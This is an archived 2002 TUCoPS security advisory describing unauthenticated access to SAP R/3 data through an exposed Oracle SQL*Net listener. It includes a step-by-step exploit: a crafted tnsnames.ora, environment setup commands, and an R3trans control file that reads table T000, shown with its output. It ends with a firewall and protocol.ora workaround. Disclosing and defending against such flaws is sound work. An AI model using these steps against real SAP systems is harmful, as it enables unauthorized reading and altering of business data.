Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Oracle :: orac5317.htm

SAP R/3 spoofing via database listener

30th Apr 2002 [SBWID-5317]

	SAP R/3 spoofing via database listener


	All R/3 Releases using SQL*net V2 (3.x, 4.x, 6.10)


	From Jochen Hein [] announcement :

	Every user having network access to the  oracle  listener  port  on  the
	database host may read/write/modify any SAP data.

	 Exploit :



	Needed knowledge: IP address (and port) of the  database  host  and  the
	System ID (SID).  You  may  get  them  with  a  packet  sniffer,  social
	engineering or just running sapinfo against a running SAP  R/3.  sapinfo
	also tells you the R/3 release, which we\'ll need  (we  use  R3trans  of
	that release.

	With these informations an attacker can  create  a  local  user  sidadm,
	craft a tnsnames.ora and an environment for running R3trans. =



	        (ADDRESS =

	          (COMMUNITY =

	          (PROTOCOL = TCP)

	          (Host = hostname)

	          (Port = 1527)




	       (SID = SID)

	       (GLOBAL_NAME =




	And running the commands (note you need the R3trans from the target  R/3

	sidadm> export TNS_ADMIN=$HOME/

	sidadm> export ORACLE_HOME=/oracle/SID

	sidadm> export ORACLE_SID=SID

	sidadm> export PATH=\"$PATH:/oracle/SID/817_32/bin:/usr/sap/SID/SYS/exe/run\"

	sidadm> export dbms_type=oraexport DIR_LIBRARY=/usr/sap/SID/SYS/exe/run

	sidadm> export dbs_ora_tnsname=SID

	sidadm> export TNS_ADMIN=/home/sidadm

	sidadm> cat control




	# select table where name = T000

	select * from t000

	sidadm> R3trans control


	sidadm> strings trans.dat


	q  000SAP AG             Walldorf               DEM [...]

	q  001Auslieferungsmandant R11 Kundstadt        EUR [...]




	Any user on the  local  network  can  access  any  SAP  data  read/write
	without password. No SAP authority checks are applied.


	 References :



	A complete exploit and more remarks are (in German) [2]here.

	OSS note 186119.






	Workaround is to restrict access to the Oracle port either with  network
	means (a firewall) or using the following protocol.ora  options  on  the
	database server:

	tcp.nodelay = true

	tcp.validnode_checking = yes

	tcp.invited_nodes = ( hostname, hostname )



	There is no patch available.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH